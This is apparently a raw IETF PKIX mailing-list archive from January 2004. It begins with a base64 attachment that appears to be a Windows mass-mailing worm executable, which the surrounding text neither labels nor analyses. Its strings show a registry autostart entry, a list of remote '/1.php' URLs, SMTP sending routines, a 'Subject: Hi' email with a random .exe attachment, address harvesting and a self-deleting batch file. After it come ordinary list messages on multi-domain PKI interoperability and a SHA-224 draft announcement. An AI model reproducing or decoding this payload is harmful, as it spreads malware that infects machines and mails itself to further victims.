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 hcAPhGIBAAD/dQzo7uT//4tVDIsSagBqBI2FqP7//1D/dQz/Ugz/dQzo4+T//2oAagT/taj+ ////dQz/dQjoHOr//4XAD4QfAQAA/3UM6Kvk//9oBAEAAI2FN////1DomAIAAGoFjYWv/v// UOhB4P//aPlXQACNhTf///9Q6McCAACNha/+//9QjYU3////UOi0AgAAaAdYQACNhTf///9Q 6KMCAABqAGoAagJqAGoCaAAAAECNhTf///9Q6MgBAACJhaD+//9AD4SbAAAAi1UMixKNhaT+ //9QaIAAAACNhbf+//9Q/3UM/1IMg72k/v//AHQjagCNhaT+//9Q/7Wk/v//jYW3/v//UP+1 oP7//+gtAgAA67b/taD+///oVAEAAIC9rv7//wN1EWgBWEAAjYU3////UOgMAgAAagCNhTf/ //9Q6PIBAACAva7+//8DdRXouuD//+sOgL2u/v//BHUF6Krg////dQjoCAIAAP81HH9AAOij AQAAM8BbX17JwggAVYvsg8TwVldT/wVYV0AAjUX8UOjE4v//agFqBWoI/3X8/3UI6LDo//// dfzoR+P//2oIjUX0UOjO3v//i1X8ixJqAGoIjUX0UP91/P9SDI119IA+Q3UagH4B/3UUZoN+ Av91Df91/P91COjG/P//6wLrAusI/3UI6HcBAAD/dfzoauL///8NWFdAADPAW19eycIEAGoA 6JUBAADon+b//4M9A1BAAAB1FGjIrwAA6AHh//8FiBMAAKMDUEAAaFxXQABo9jBAAP81A1BA AOiw6v//6Dr8//+DPVRXQAAAdAXo8/r//2joAwAA6LEAAADr9Mz/JaRAQAD/JbhAQAD/JbRA QAD/JbBAQAD/JaxAQAD/JZxAQAD/JaBAQAD/JahAQAD/JSRAQAD/JShAQAD/JSxAQAD/JTBA QAD/JTRAQAD/JThAQAD/JTxAQAD/JUBAQAD/JURAQAD/JUhAQAD/JUxAQAD/JVBAQAD/JVRA QAD/JVhAQAD/JVxAQAD/JWBAQAD/JbxAQAD/JWRAQAD/JWhAQAD/JWxAQAD/JXBAQAD/JXRA QAD/JXhAQAD/JXxAQAD/JYBAQAD/JYRAQAD/JYhAQAD/JYxAQAD/JZBAQAD/JZRAQAD/JZhA QAD/JeRAQAD/JTBBQAD/JShBQAD/JSRBQAD/JSBBQAD/JRxBQAD/JRhBQAD/JRRBQAD/JQxB QAD/JQBBQAD/JQRBQAD/JQhBQAD/JRBBQAD/JSxBQAD/JcRAQAD/JchAQAD/JdxAQAD/JdRA QAD/JdhAQAD/JdBAQAD/JfhAQAD/JfRAQAD/JfBAQAD/JexAQAD/JRRAQAD/JRBAQAD/JQxA QAD/JQhAQAD/JRxAQAD/JQBAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALhHAAAAAAAAdkcAAGJHAABSRwAA REcAAAAAAACWRwAAAAAAALZDAADCQwAA1EMAAORDAAD2QwAACEQAABhEAAAmRAAANkQAAFBE AABmRAAAfEQAAIxEAACeRAAAuEQAANBEAADsRAAA+kQAAAZFAAAWRQAAJkUAAC5FAABGRQAA WEUAAG5FAAB4RQAAhEUAAJBFAACcRQAAqEUAAIhDAACYQwAAOEMAAKhDAAByQwAAZEMAAFhD AABGQwAA3kQAAAAAAAB2RgAAhkYAAAAAAADKRgAAskYAAL5GAACoRgAAAAAAAMJFAAAAAAAA JEcAABRHAAD4RgAA4kYAAAAAAAA8RgAARkYAAE5GAAAwRgAAWEYAACJGAAASRgAACEYAAPpF AADyRQAA6EUAAGBGAADaRQAAAAAAACRCAAAAAAAAAAAAALRFAAAkQAAA5EIAAAAAAAAAAAAA zkUAAORAAAAAQwAAAAAAAAAAAABqRgAAAEEAAMRCAAAAAAAAAAAAAJ5GAADEQAAA0EIAAAAA AAAAAAAA1kYAANBAAADsQgAAAAAAAAAAAAA4RwAA7EAAAAhCAAAAAAAAAAAAAIhHAAAIQAAA HEIAAAAAAAAAAAAAqkcAABxAAAAAQgAAAAAAAAAAAADIRwAAAEAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAuEcAAAAAAAB2RwAAYkcAAFJHAABERwAAAAAAAJZHAAAAAAAAtkMAAMJDAADUQwAA 5EMAAPZDAAAIRAAAGEQAACZEAAA2RAAAUEQAAGZEAAB8RAAAjEQAAJ5EAAC4RAAA0EQAAOxE AAD6RAAABkUAABZFAAAmRQAALkUAAEZFAABYRQAAbkUAAHhFAACERQAAkEUAAJxFAACoRQAA iEMAAJhDAAA4QwAAqEMAAHJDAABkQwAAWEMAAEZDAADeRAAAAAAAAHZGAACGRgAAAAAAAMpG AACyRgAAvkYAAKhGAAAAAAAAwkUAAAAAAAAkRwAAFEcAAPhGAADiRgAAAAAAADxGAABGRgAA TkYAADBGAABYRgAAIkYAABJGAAAIRgAA+kUAAPJFAADoRQAAYEYAANpFAAAAAAAAGgBDbG9z ZUhhbmRsZQAdAENvbXBhcmVGaWxlVGltZQAkAENvcHlGaWxlQQAwAENyZWF0ZUZpbGVBADEA Q3JlYXRlRmlsZU1hcHBpbmdBAAA7AENyZWF0ZU11dGV4QQAARgBDcmVhdGVUaHJlYWQAAIAA RXhpdFByb2Nlc3MAjwBGaW5kQ2xvc2UAkwBGaW5kRmlyc3RGaWxlQQAAnABGaW5kTmV4dEZp bGVBAMgAR2V0Q29tbWFuZExpbmVBAN8AR2V0RGF0ZUZvcm1hdEEAAOgAR2V0RHJpdmVUeXBl QQD1AEdldEZpbGVTaXplAP4AR2V0TG9jYWxUaW1lAAABAUdldExvZ2ljYWxEcml2ZVN0cmlu Z3NBAAcBR2V0TW9kdWxlRmlsZU5hbWVBAAA8AUdldFN5c3RlbURpcmVjdG9yeUEAUgFHZXRU aWNrQ291bnQAAFMBR2V0VGltZUZvcm1hdEEAAFUBR2V0VGltZVpvbmVJbmZvcm1hdGlvbgAA YgFHZXRXaW5kb3dzRGlyZWN0b3J5QQAAZwFHbG9iYWxBbGxvYwBuAUdsb2JhbEZyZWUAAKoB TG9jYWxBbGxvYwAArgFMb2NhbEZyZWUAugFNYXBWaWV3T2ZGaWxlAP0BUmVsZWFzZU11dGV4 AABgAlNsZWVwAGUCU3lzdGVtVGltZVRvRmlsZVRpbWUAAHcCVW5tYXBWaWV3T2ZGaWxlAI8C V2FpdEZvclNpbmdsZU9iamVjdACUAldpbkV4ZWMAngJXcml0ZUZpbGUAtQJsc3RyY2F0QQAA uQJsc3RyY21waUEAuwJsc3RyY3B5QQAAvwJsc3RybGVuQQAAa2VybmVsMzIuZGxsAABiAndz cHJpbnRmQQB1c2VyMzIuZGxsAAAhAFdTQVN0YXJ0dXAAACQAYWNjZXB0AAAlAGJpbmQAACYA Y2xvc2Vzb2NrZXQAJwBjb25uZWN0ACoAZ2V0aG9zdGJ5bmFtZQArAGdldGhvc3RuYW1lADYA aW5ldF9hZGRyADoAbGlzdGVuAAA+AHJlY3YAAEMAc2VsZWN0AABEAHNlbmQAAEkAc29ja2V0 AAB3c29jazMyLmRsbAAxAENvSW5pdGlhbGl6ZQAAawBDcmVhdGVTdHJlYW1PbkhHbG9iYWwA b2xlMzIuZGxsANcAU3RyRHVwQQDmAFN0clJDaHJBAADzAFN0clN0cklBAAD6AFN0clRyaW1B AABzaGx3YXBpLmRsbABpAEludGVybmV0Q2xvc2VIYW5kbGUAewBJbnRlcm5ldEdldENvbm5l Y3RlZFN0YXRlAIYASW50ZXJuZXRPcGVuQQCHAEludGVybmV0T3BlblVybEEAAHdpbmluZXQu ZGxsAIABUmVnQ2xvc2VLZXkAgwFSZWdDcmVhdGVLZXlBAKMBUmVnUXVlcnlWYWx1ZUV4QQAA rgFSZWdTZXRWYWx1ZUV4QQAAYWR2YXBpMzIuZGxsAAAqAEdldE5ldHdvcmtQYXJhbXMAAGlw aGxwYXBpLmRsbAAAbgBTaGVsbEV4ZWN1dGVBAFNIRUxMMzIuZGxsAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMTIAeRoAADE1MS4yMDEuMC4zOQAAAAAA AAAAAC53YWIALnR4dAAuaHRtAC5odG1sAAAucjEAQGhvdG1haWwuY29tAEBtc24uY29tAEBt aWNyb3NvZnQAQGF2cC4AACVzP3A9JWx1JmlkPSVzAGh0dHA6Ly93d3cuZWxyYXNzaG9wLmRl LzEucGhwAGh0dHA6Ly93d3cuaXQtbXNjLmRlLzEucGhwAGh0dHA6Ly93d3cuZ2V0eW91cmZy ZWUubmV0LzEucGhwAGh0dHA6Ly93d3cuZG1kZXNpZ24uZGUvMS5waHAAaHR0cDovLzY0LjE3 Ni4yMjguMTMvMS5waHAAaHR0cDovL3d3dy5sZW9uemVybml0c2t5LmNvbS8xLnBocABodHRw Oi8vMjE2Ljk4LjEzNi4yNDgvMS5waHAAaHR0cDovLzIxNi45OC4xMzQuMjQ3LzEucGhwAGh0 dHA6Ly93d3cuY2Ryb21jYS5jb20vMS5waHAAaHR0cDovL3d3dy5rdW5zdC1pbi10ZW1wbGlu LmRlLzEucGhwAGh0dHA6Ly92aXB3ZWIucnUvMS5waHAAaHR0cDovL2FudG9sLWNvLnJ1LzEu cGhwAGh0dHA6Ly93d3cuYmFncy1kb3N0YXZrYS5tYWdzLnJ1LzEucGhwAGh0dHA6Ly93d3cu NXgxMi5ydS8xLnBocABodHRwOi8vYm9zZS1hdWRpby5uZXQvMS5waHAAaHR0cDovL3d3dy5z dHRuZ2RhdGEuZGUvMS5waHAAaHR0cDovL3doOS50dS1kcmVzZGVuLmRlLzEucGhwAGh0dHA6 Ly93d3cubWljcm9udWtlLm5ldC8xLnBocABodHRwOi8vd3d3LnN0YWR0aGFnZW4ub3JnLzEu cGhwAGh0dHA6Ly93d3cuYmVhc3R5LWNhcnMuZGUvMS5waHAAaHR0cDovL3d3dy5wb2xvaGV4 ZS5kZS8xLnBocABodHRwOi8vd3d3LmJpbm84OC5kZS8xLnBocABodHRwOi8vd3d3LmdyZWZy YXRocGFlbnouZGUvMS5waHAAaHR0cDovL3d3dy5iaGFtaWR5LmRlLzEucGhwAGh0dHA6Ly93 d3cubXlzdGljLXZ3cy5kZS8xLnBocABodHRwOi8vd3d3LmF1dG8taG9iYnktZXNzZW4uZGUv MS5waHAAaHR0cDovL3d3dy5wb2xvemlja2UuZGUvMS5waHAAaHR0cDovL3d3dy50d3ItbXVz aWMuZGUvMS5waHAAaHR0cDovL3d3dy5zYy1lcmJlbmRvcmYuZGUvMS5waHAAaHR0cDovL3d3 dy5tb250YW5pYS5kZS8xLnBocABodHRwOi8vd3d3Lm1lZGktbWFydGluLmRlLzEucGhwAGh0 dHA6Ly92dmNnbi5kZS8xLnBocABodHRwOi8vd3d3LmJhbGxvbmZvdG8uY29tLzEucGhwAGh0 dHA6Ly93d3cubWFyZGVyLWdtYmguZGUvMS5waHAAaHR0cDovL3d3dy5kdmQtZmlsbWUuY29t LzEucGhwAGh0dHA6Ly93d3cuc21lYW5nb2wuY29tLzEucGhwAABEYXRlOiAlcw0KVG86ICVz DQpTdWJqZWN0OiBIaQ0KRnJvbTogJXMNCk1lc3NhZ2UtSUQ6IDwlcyVzPg0KTUlNRS1WZXJz aW9uOiAxLjANCkNvbnRlbnQtVHlwZTogbXVsdGlwYXJ0L21peGVkOw0KICAgICAgICBib3Vu ZGFyeT0iLS0tLS0tLS0lcyINCg0KAC0tLS0tLS0tLS0lcw0KQ29udGVudC1UeXBlOiB0ZXh0 L3BsYWluOyBjaGFyc2V0PSJ1cy1hc2NpaSINCkNvbnRlbnQtVHJhbnNmZXItRW5jb2Rpbmc6 IDdiaXQNCg0KAC0tLS0tLS0tLS0lcw0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LW1z ZG93bmxvYWQ7IG5hbWU9IlslJVJBTkQlJV0uZXhlIg0KQ29udGVudC1UcmFuc2Zlci1FbmNv ZGluZzogYmFzZTY0DQpDb250ZW50LURpc3Bvc2l0aW9uOiBhdHRhY2htZW50OyBmaWxlbmFt ZT0iWyUlUkFORCUlXS5leGUiDQoNCgANCg0KLS0tLS0tLS0tLSVzLS0NCg0KLg0KACBUZXN0 ID0pDQpbJVJBTkQlXVslUkFORCVdDQotLQ0KVGVzdCwgeWVwLg0KOmwNCmRlbCAlMQ0KaWYg ZXhpc3QgJTEgZ290byBsDQpkZWwgJTAAYS5iYXQAb3BlbgBxAgAAzQ0BAAAAAAAAAAAAAAAA AAAAAAAAAAAAY2FsYy5leGUAb3BlbgBTT0ZUV0FSRVxXaW5kb3dzOTgAdWlkAFNPRlRXQVJF XE1pY3Jvc29mdFxXaW5kb3dzXEN1cnJlbnRWZXJzaW9uXFJ1bgBkM2R1cGRhdGUuZXhlAFxi YmVhZ2xlLmV4ZQBmcnVuAAAAAAAAAAAAAAAAAAAsACAsDQoAPAA+AENDOiAAQkNDOgBUbzog AEhFTE8gJXMNCgBSU0VUDQoATUFJTCBGUk9NOjwlcz4NCgBSQ1BUIFRPOjwlcz4NCgBEQVRB DQoAWyVSQU5EJV0AZGRkJywnIGRkIE1NTSB5eXl5IABISDptbTpzcyAAJTAzaSUwMmkADQpc ACouKgBiZWFnbGVfYmVhZ2xlAFxic3VwbGQAIC11cGQALmV4ZQAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAgADAAAAIAAAgA4AAAA4AACAAAAAAAAAAAAAAAAAAAABAAEAAABQAACA AAAAAAAAAAAAAAAAAAABAAEAAABoAACAAAAAAAAAAAAAAAAAAAABAAAAAACAAAAAAAAAAAAA AAAAAAAAAAABAAAAAACQAAAAoJAAAOgCAAAAAAAAAAAAAIiTAAAUAAAAAAAAAAAAAAAoAAAA IAAAAEAAAAABAAQAAAAAAIACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAICAAIAA AACAAIAAgIAAAMDAwACAgIAAAAD/AAD/AAAA//8A/wAAAP8A/wD//wAA////ABERERERERER ERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERER EREREREREREREREREREREREREQAAAAAAAAAAAAAAAAAAARZkREREREREREREREREREAW5mZm ZmZmZmZmZmZmZmZAFvZgAGAAYABgAGAAAABmQBbmb3BvcG9wb3Bvd3dwZkAW9m/wb/Bv8G/w b///8GZAFuZmZmZmZmZmZmZmZmZmQBb2YABgAGAAYABgAGAAZkAW5m9wb3BvcG9wb3BvcGZA FvZv8G/wb/Bv8G/wb/BmQBbmZmZmZmZmZmZmZmZmZkAW9mAAYABgAGAAYABgAGZAFuZvcG9w b3BvcG9wb3BmQBb2b/Bv8G/wb/Bv8G/wZkAW5mZmZmZmZmZmZmZmZmZAFvZgd3d3d3d3d2Zm ZmZmQBbmYP////////dmZmZmZkAW9mB3d3d3d3d3ZmZmZmZAFuZgAAAAAAAAAGZmZmZmQBb+ /v7+/v7+/v7+/v7+/kARZmZmZmZmZmZmZmZmZmZhERERERERERERERERERERERERERERERER ERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERER ERERERERERERERERERERERER///////////////////////////AAAABgAAAAIAAAACAAAAA gAAAAIAAAACAAAAAgAAAAIAAAACAAAAAgAAAAIAAAACAAAAAgAAAAIAAAACAAAAAgAAAAIAA AACAAAAAgAAAAMAAAAH///////////////////////////////8AAAEAAQAgIBAAAQAEAOgC AAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA= ----------275526655180024-- Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.10/8.12.8) with ESMTP id i0G2Mbib087415; Thu, 15 Jan 2004 18:22:37 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.10/8.12.9/Submit) id i0G2MbD4087413; Thu, 15 Jan 2004 18:22:37 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from iscan01.secomtrust.net (iscan01.secomtrust.net [61.114.177.102]) by above.proper.com (8.12.10/8.12.8) with SMTP id i0G2MYib087377 for <ietf-pkix@imc.org>; Thu, 15 Jan 2004 18:22:35 -0800 (PST) (envelope-from shimaoka@secom.ne.jp) Received: (qmail 26176 invoked by alias); 16 Jan 2004 02:22:36 -0000 Delivered-To: alias-map-ietf-pkix@imc.org@MAP Received: (qmail 26167 invoked by alias); 16 Jan 2004 02:22:35 -0000 Received: from localhost (HELO mail.secomtrust.net) (127.0.0.1) by localhost with SMTP; 16 Jan 2004 02:22:35 -0000 Received: (qmail 21659 invoked from network); 16 Jan 2004 02:22:35 -0000 Received: from unknown (HELO ?172.30.5.54?) (172.30.5.54) by mail with SMTP; 16 Jan 2004 02:22:35 -0000 Date: Fri, 16 Jan 2004 11:22:42 +0900 From: Masaki SHIMAOKA <shimaoka@secom.ne.jp> To: "Anders Rundgren" <anders.rundgren@telia.com> Subject: Re[2]: Revised I-D: Memorandum for multi-domain PKI Interoperability Cc: "IETF-PKIX" <ietf-pkix@imc.org>, <mpki@jnsa.org> In-Reply-To: <000201c3db7e$85bfaf00$0500a8c0@arport> References: <20040114194632.05BD.SHIMAOKA@secom.ne.jp> <000201c3db7e$85bfaf00$0500a8c0@arport> Message-Id: <20040116103718.05FB.SHIMAOKA@secom.ne.jp> MIME-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: 7bit X-Mailer: Becky! ver. 2.06.02 Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> Anders, > I think you should regard my comments as "reflections" regarding the > possible directions PKI may take, not as criticism of your I-D. Okay. Thanks for your detailed description. I understand your comments and agree. This I-D SHOULD NOT be required for users such as bank. They SHOULD NOT touch PKI directly, their purpose is merely to use application securely. For them, PKI is just one of ways, and kind of PKI they use is not important. I think that this I-D SHOULD be required for persons who touch PKI directly such as PKI SIers and PKI application vendors. Thanks, shima On Thu, 15 Jan 2004 16:43:38 +0100 "Anders Rundgren" <anders.rundgren@telia.com> wrote: > Masaki, > > I think you should regard my comments as "reflections" regarding the > possible directions PKI may take, not as criticism of your I-D. > > That is, I envision a rather scattered picture where the private sector > and governments will likely select different schemes as they are > driven by different motives. For the private sector "cost" and > "simplicity" are the prime considerations, not "security". Security > unlike most other qualities, is hard to measure and does not even > necessarily mean the same thing to everybody when you go outside > of pure cryptography. > > To take an example: A system that requires considerable competence > to be deployed may be considered as less secure than a simple one > as there is a risk that the competence required is not in place due to > lack of availability, or that customers simply cannot afford it. > > >> I believe your scheme does not address the business model issue, > >> i.e. the fact that banks have converted PKI into a transaction system. > > >Please tell me how this I-D does not meet it. > > I would not worry too much about this as banks all over the world > are trying to introduce PKI systems where the relying parties pay > for each status lookup. They usually require that relying parties: > > - Installs trust network specific (usually NDA protected) licensed software > - Signs business contracts with each accepted trust network > > That is, such PKIs are outside of interoperability concerns > as each trust network is effectively isolated from other trust > networks. This is very similar to the VISA and MasterCard > payment networks. To cope with this, "mediator" service providers > "add value" (=charging more money) by offering "standardized" > (=proprietary) interfaces as well as a single contract, to relying > parties needing access to multiple trust networks. > > Regarding the private sector's use of PKI, I believe rather little > is to be expected as there in spite of decades of "good intentions", > is nothing that can be categorized as a ubiquitous, "standard" > (industry, de-facto, de-jure, whatever) key container, supported by > current operating systems and available from multiple vendors. The > so called "soft certificates" often cause more problems than they solve > in a corporate environment, and do therefore not challenge the current > de-facto client security standard, the user-id/password. This makes > me believe that "PKI interoperability" is not exactly on the top of > the private sector's menu, they have yet to get PKI to work inside > of their organizations. There are of course exceptions, but they > are in my opinion just that, exceptions. > > Regards > Anders Rundgren > Independent Consultant, PKI and e-Business > ----- Masaki SHIMAOKA SECOM Trust.net System Engineering Dpt. Tel: +81 422 91 8498 (ext.3605) Fax: +81 422 45 0536 e-mail: shimaoka@secom.ne.jp Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.10/8.12.8) with ESMTP id i0FLACib069738; Thu, 15 Jan 2004 13:10:12 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.10/8.12.9/Submit) id i0FLACeX069737; Thu, 15 Jan 2004 13:10:12 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from ietf.org (odin.ietf.org [132.151.1.176]) by above.proper.com (8.12.10/8.12.8) with ESMTP id i0FLABib069732 for <ietf-pkix@imc.org>; Thu, 15 Jan 2004 13:10:12 -0800 (PST) (envelope-from dinaras@cnri.reston.va.us) Received: from CNRI.Reston.VA.US (localhost [127.0.0.1]) by ietf.org (8.9.1a/8.9.1a) with ESMTP id QAA28534; Thu, 15 Jan 2004 16:10:11 -0500 (EST) Message-Id: <200401152110.QAA28534@ietf.org> Mime-Version: 1.0 Content-Type: Multipart/Mixed; Boundary="NextPart" To: IETF-Announce: ; Cc: ietf-pkix@imc.org From: Internet-Drafts@ietf.org Reply-to: Internet-Drafts@ietf.org Subject: I-D ACTION:draft-ietf-pkix-sha224-00.txt Date: Thu, 15 Jan 2004 16:10:11 -0500 Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> --NextPart A New Internet-Draft is available from the on-line Internet-Drafts directories. This draft is a work item of the Public-Key Infrastructure (X.509) Working Group of the IETF. Title : A 224-bit One-way Hash Function: SHA-224 Author(s) : R. Housley Filename : draft-ietf-pkix-sha224-00.txt Pages : 6 Date : 2004-1-15 This document specifies a 224-bit one-way hash function, called SHA-224. A SHA-224 is based on SHA-256, but it uses an different initial value and the result is truncated to 224 bits. A URL for this Internet-Draft is: http://www.ietf.org/internet-drafts/draft-ietf-pkix-sha224-00.txt To remove yourself from the IETF Announcement list, send a message to ietf-announce-request with the word unsubscribe in the body of the message. Internet-Drafts are also available by anonymous FTP. Login with the username "anonymous" and a password of your e-mail address. After logging in, type "cd internet-drafts" and then "get draft-ietf-pkix-sha224-00.txt". A list of Internet-Drafts directories can be found in http://www.ietf.org/shadow.html or ftp://ftp.ietf.org/ietf/1shadow-sites.txt Internet-Drafts can also be obtained by e-mail. Send a message to: mailserv@ietf.org. In the body type: "FILE /internet-drafts/draft-ietf-pkix-sha224-00.txt". NOTE: The mail server at ietf.org can return the document in MIME-encoded form by using the "mpack" utility. To use this feature, insert the command "ENCODING mime" before the "FILE" command. To decode the response(s), you will need "munpack" or a MIME-compliant mail reader. Different MIME-compliant mail readers exhibit different behavior, especially when dealing with "multipart" MIME messages (i.e. documents which have been split up into multiple messages), so check your local documentation on how to manipulate these messages. Below is the data which will enable a MIME compliant mail reader implementation to automatically retrieve the ASCII version of the Internet-Draft. --NextPart Content-Type: Multipart/Alternative; Boundary="OtherAccess" --OtherAccess Content-Type: Message/External-body; access-type="mail-server"; server="mailserv@ietf.org" Content-Type: text/plain Content-ID: <2004-1-15152554.I-D@ietf.org> ENCODING mime FILE /internet-drafts/draft-ietf-pkix-sha224-00.txt --OtherAccess Content-Type: Message/External-body; name="draft-ietf-pkix-sha224-00.txt"; site="ftp.ietf.org"; access-type="anon-ftp"; directory="internet-drafts" Content-Type: text/plain Content-ID: <2004-1-15152554.I-D@ietf.org> --OtherAccess-- --NextPart-- Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.10/8.12.8) with ESMTP id i0FFoCib052626; Thu, 15 Jan 2004 07:50:12 -0800 (PST) (envelope-from 